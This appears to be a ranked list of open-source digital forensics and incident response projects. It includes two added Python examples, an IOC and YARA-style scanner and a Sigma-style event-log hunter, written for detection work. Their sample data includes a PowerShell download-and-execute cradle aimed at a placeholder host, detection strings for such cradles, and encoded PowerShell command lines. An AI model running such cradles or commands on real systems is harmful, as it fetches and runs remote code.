DFIR

Top 23 DFIR Open-Source Projects

  • my-arsenal-of-aws-security-tools

    List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.

  • awesome-incident-response

    A curated list of tools for incident response

  • LOLBAS

    Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)

    Project mention: How do i replicate GTFOBins layout ? | /r/web_design | 2023-12-05

    I have an idea for a similar style website that I would like to create, and I was going to use GTFOBins as a template and amend it to fit my data, much like LOLBAS has.

  • zeek

    Zeek is a powerful network analysis framework that is much different from the typical IDS you may know.

    Project mention: Suricata VS zeek - a user suggested alternative | libhunt.com/r/suricata | 2024-01-02

  • DetectionLab

    Automate the creation of a lab environment complete with security tooling and logging best practices

  • ThreatHunter-Playbook

    A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.

  • awesome-forensics

    A curated list of awesome forensic analysis tools and resources

    Project mention: A fun new feature we are working on in systemd: userspace-only reboot | news.ycombinator.com | 2023-07-06

    https://github.com/cugu/awesome-forensics#acquisition : Memory forensics acquisition tools: POFR: PenguinOS Flight Recorder, LIME

  • Loki

    Loki - Simple IOC and YARA Scanner (by Neo23x0)

    Project mention: My Boss Downloaded and Opened a .lnk File and Installed a Malware in His Device | /r/computerforensics | 2023-06-06

    You should run a tool like Loki for IOC scanning. This will identify persistence: https://github.com/Neo23x0/Loki

  • TheHive

    TheHive: a Scalable, Open Source and Free Security Incident Response Platform

    Project mention: What are your go-to tools for task management and/or case work? | /r/cybersecurity | 2023-12-09

    I had a quick test with TheHive; looks pretty nice. https://thehive-project.org/

  • IntelOwl

    IntelOwl: manage your Threat Intelligence at scale

    Project mention: Monthly Security Checklist | /r/msp | 2023-06-25

  • chainsaw

    Rapidly Search and Hunt through Windows Forensic Artefacts

    Project mention: Agent event queue is flooded. Check the agent configuration | /r/Wazuh | 2023-06-30

  • timesketch

    Collaborative forensic timeline analysis

  • sysmon-modular

    A repository of sysmon configuration modules

    Project mention: Sysmon 15.0 is out now with advanced features | /r/sysadmin | 2023-06-29

    I was specifically using the https://github.com/olafhartong/sysmon-modular config, but once we started seeing systems crash I tried building extremely minimal configs and still found them causing hangs.

  • signature-base

    YARA signature and IOC database for my scanners and tools

  • EVTX-ATTACK-SAMPLES

    Windows Events Attack Samples

  • hayabusa

    Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.

    Project mention: Release v2.5.0 🦅 of Hayabusa - Hayabusa is a Windows event log fast forensics timeline generator and threat hunting tool | /r/blueteamsec | 2023-05-07

  • cyberchef-recipes

    A list of cyber-chef recipes and curated links

  • yeti

    Your Everyday Threat Intelligence

  • MemLabs

    Educational, CTF-styled labs for individuals interested in Memory Forensics

    Project mention: Platform for training digital forensics | /r/digitalforensics | 2023-04-21

  • matano

    Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS

    Project mention: Cisco Acquires Splunk | news.ycombinator.com | 2023-09-21

    Sorry, that's https://matano.dev

  • beagle

    Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)

  • Cortex

    Cortex: a Powerful Observable Analysis and Active Response Engine (by TheHive-Project)

  • threathunting

    A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
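
Several entries above (Loki, signature-base) are IOC and YARA scanners. The following is an added example, not code from Loki or signature-base, showing the three checks such a scanner runs over a file tree: a SHA-256 lookup against hash indicators, regexes over the full path for filename indicators, and a YARA-like string rule that fires once a minimum number of its strings occur in the file content. Every indicator and sample file here is constructed for the demonstration; the hash indicator is simply the SHA-256 of the constructed bytes, and the indicator names (Constructed_Sample_A, PS_Downloader_Pattern) and regexes are hypothetical.

```python
"""Loki-style IOC scan: hash, filename and YARA-like string indicators.
Added example; not code from Loki or signature-base."""
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass


@dataclass
class StringRule:
    """YARA-like rule: fires when at least min_hits of its strings occur in the file."""
    name: str
    strings: list
    min_hits: int = 1


@dataclass
class Finding:
    path: str
    reason: str


# Constructed sample content; its SHA-256 plays the role of a hash IOC (hypothetical name).
MALWARE_SAMPLE = b"MZ\x90\x00constructed-sample-not-real-malware"
HASH_IOCS = {hashlib.sha256(MALWARE_SAMPLE).hexdigest(): "Constructed_Sample_A"}

# Hypothetical filename indicators, applied to the full path.
FILENAME_IOCS = [
    re.compile(r"(^|[\\/])svch0st\.exe$", re.IGNORECASE),                 # look-alike of svchost.exe
    re.compile(r"[\\/]Temp[\\/][^\\/]+\.(ps1|vbs|hta)$", re.IGNORECASE),  # scripts dropped in Temp
]

# Hypothetical string rule: two of three download-cradle fragments must be present.
STRING_RULES = [
    StringRule("PS_Downloader_Pattern", [b"DownloadString", b"IEX ", b"-EncodedCommand"], min_hits=2),
]


def sha256_of(path, chunk=1 << 20):
    """Stream the file so large files do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_file(path, hash_iocs=HASH_IOCS, filename_iocs=FILENAME_IOCS,
              string_rules=STRING_RULES, max_bytes=32 << 20):
    findings = []
    for pat in filename_iocs:
        if pat.search(path):
            findings.append(Finding(path, f"filename:{pat.pattern}"))
    name = hash_iocs.get(sha256_of(path))
    if name:
        findings.append(Finding(path, f"hash:{name}"))
    if os.path.getsize(path) <= max_bytes:  # content rules are skipped above a size cap
        with open(path, "rb") as fh:
            data = fh.read()
        for rule in string_rules:
            hits = sum(1 for s in rule.strings if s in data)
            if hits >= rule.min_hits:
                findings.append(Finding(path, f"yara:{rule.name}"))
    return findings


def scan_tree(root, **kw):
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            try:
                findings.extend(scan_file(os.path.join(dirpath, fn), **kw))
            except OSError:
                continue  # unreadable or locked file: a real scanner logs and moves on
    return findings


def demo():
    """Build a constructed tree, scan it, return {relative path: sorted reasons}."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Temp"))
        samples = {
            "report.pdf": MALWARE_SAMPLE,    # renamed payload: only the hash check catches it
            "svch0st.exe": b"benign bytes",  # name look-alike: filename indicator only
            "Temp/update.ps1": b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
            "notes.txt": b"nothing to see here",
        }
        for rel, content in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(content)
        out = {}
        for f in scan_tree(root):
            rel = os.path.relpath(f.path, root).replace(os.sep, "/")
            out.setdefault(rel, []).append(f.reason)
        return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", ", ".join(reasons))
```

Running it reports report.pdf (hash only), svch0st.exe (filename only) and Temp/update.ps1 (filename plus string rule) and stays silent on notes.txt. The point of the three layers: renaming defeats the filename check, recompiling defeats the hash check, but a dropped file still has to carry its strings, which is why signature-base pairs hash and filename IOCs with YARA rules.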


NOTE: The open source projects on this list are ordered by number of GitHub stars. The number of mentions indicates repo mentions in the last 12 months or since we started tracking (Dec 2020). The latest post mention was on 2024-01-02.
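
chainsaw and hayabusa both hunt through Windows event logs with Sigma rules and emit a time-sorted timeline, and EVTX-ATTACK-SAMPLES supplies the event data to test such rules against. The block below is an added example of the core of that pipeline, not code from either project: Sigma rules written as dicts in Sigma's own structure (selection maps are AND, list values are OR, field modifiers contains/startswith/endswith/all, and the conditions "selection" and "selection and not filter"), evaluated over flattened event records of the kind an EVTX-to-JSON export produces. The three rules, the allow-listed parent in the filter, the host name and all event records are constructed for the demonstration.

```python
"""Sigma-style hunt over Windows event records, emitting a timeline.
Added example in the spirit of hayabusa/chainsaw; not their code."""

# Constructed rules in Sigma's structure (dicts, so no YAML library is needed).
RULES = [
    {"title": "Encoded PowerShell Command Line", "level": "high",
     "logsource": {"product": "windows", "service": "sysmon"},
     "detection": {
         "selection": {"EventID": 1,
                       "Image|endswith": "\\powershell.exe",
                       "CommandLine|contains": ["-enc", "-EncodedCommand"]},
         # hypothetical allow-listed parent process, to show "and not filter"
         "filter": {"ParentImage|endswith": "\\Monitoring\\agent.exe"},
         "condition": "selection and not filter"}},
    {"title": "Local User Account Created", "level": "medium",
     "logsource": {"product": "windows", "service": "security"},
     "detection": {"selection": {"EventID": 4720}, "condition": "selection"}},
    {"title": "Security Event Log Cleared", "level": "high",
     "logsource": {"product": "windows", "service": "security"},
     "detection": {"selection": {"EventID": 1102}, "condition": "selection"}},
]

# Maps a Sigma logsource service to the channel name seen in the exported records.
CHANNELS = {"sysmon": "Microsoft-Windows-Sysmon/Operational", "security": "Security"}


def match_field(actual, modifiers, expected):
    """Sigma string matching is case-insensitive; list values are OR unless 'all'."""
    if actual is None:
        return False
    value = str(actual).lower()
    wanted = [str(v).lower() for v in (expected if isinstance(expected, list) else [expected])]
    if "contains" in modifiers:
        test = lambda w: w in value
    elif "startswith" in modifiers:
        test = value.startswith
    elif "endswith" in modifiers:
        test = value.endswith
    else:
        test = value.__eq__
    return all(map(test, wanted)) if "all" in modifiers else any(map(test, wanted))


def match_selection(selection, event):
    """A selection map is an AND over its fields; 'Field|mod1|mod2' carries the modifiers."""
    for key, expected in selection.items():
        field, *modifiers = key.split("|")
        if not match_field(event.get(field), modifiers, expected):
            return False
    return True


def evaluate(rule, event):
    det = rule["detection"]
    tokens = det["condition"].split()
    if len(tokens) == 1:                                      # "selection"
        return match_selection(det[tokens[0]], event)
    if len(tokens) == 4 and tokens[1:3] == ["and", "not"]:    # "selection and not filter"
        return match_selection(det[tokens[0]], event) and not match_selection(det[tokens[3]], event)
    raise ValueError(f"unsupported condition: {det['condition']}")


def hunt(events, rules=RULES):
    """Return (UTC time, level, rule title, computer, EventID) rows sorted by time."""
    timeline = []
    for ev in events:
        for rule in rules:
            if ev.get("Channel") != CHANNELS[rule["logsource"]["service"]]:
                continue  # logsource mismatch: do not even evaluate the rule
            if evaluate(rule, ev):
                timeline.append((ev["TimeCreated"], rule["level"], rule["title"],
                                 ev["Computer"], ev["EventID"]))
    return sorted(timeline)


# Constructed records in the flattened shape an EVTX-to-JSON export yields.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SYSMON = CHANNELS["sysmon"]
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-01-05T09:12:03Z", "Channel": "Security", "Computer": "WS-042",
     "EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe"},
    {"TimeCreated": "2024-01-05T09:14:10Z", "Channel": SYSMON, "Computer": "WS-042", "EventID": 1,
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"TimeCreated": "2024-01-05T09:14:30Z", "Channel": SYSMON, "Computer": "WS-042", "EventID": 1,
     "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"TimeCreated": "2024-01-05T09:20:00Z", "Channel": "Security", "Computer": "WS-042",
     "EventID": 4720, "TargetUserName": "svc_backup2", "SubjectUserName": "jdoe"},
    {"TimeCreated": "2024-01-05T09:25:44Z", "Channel": "Security", "Computer": "WS-042",
     "EventID": 1102, "SubjectUserName": "jdoe"},
    # arrives out of order and matches the selection, but the filter excludes it
    {"TimeCreated": "2024-01-05T08:55:00Z", "Channel": SYSMON, "Computer": "WS-042", "EventID": 1,
     "ParentImage": "C:\\Program Files\\Monitoring\\agent.exe", "Image": PS,
     "CommandLine": "powershell.exe -EncodedCommand RwBlAHQALQBEAGEAdABlAA=="},
]

if __name__ == "__main__":
    for row in hunt(SAMPLE_EVENTS):
        print(" | ".join(str(c) for c in row))
```

The output is three rows in time order: the encoded PowerShell launch, the account creation and the log clear; the -File invocation never matches and the allow-listed agent's encoded command is dropped by the filter. What the real tools add on top of this core is EVTX parsing, per-logsource field-name mapping, the rest of Sigma's condition grammar (1 of selection*, aggregations) and the scale to run thousands of rules over gigabytes of logs.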

Index

What are some of the best open-source DFIR projects? This list will help you:

Rank Project Stars
1 my-arsenal-of-aws-security-tools 8,642
2 awesome-incident-response 7,038
3 LOLBAS 6,500
4 zeek 5,852
5 DetectionLab 4,476
6 ThreatHunter-Playbook 3,805
7 awesome-forensics 3,512
8 Loki 3,189
9 TheHive 3,166
10 IntelOwl 3,072
11 chainsaw 2,502
12 timesketch 2,470
13 sysmon-modular 2,463
14 signature-base 2,269
15 EVTX-ATTACK-SAMPLES 2,067
16 hayabusa 1,890
17 cyberchef-recipes 1,881
18 yeti 1,609
19 MemLabs 1,520
20 matano 1,334
21 beagle 1,250
22 Cortex 1,237
23 threathunting 1,099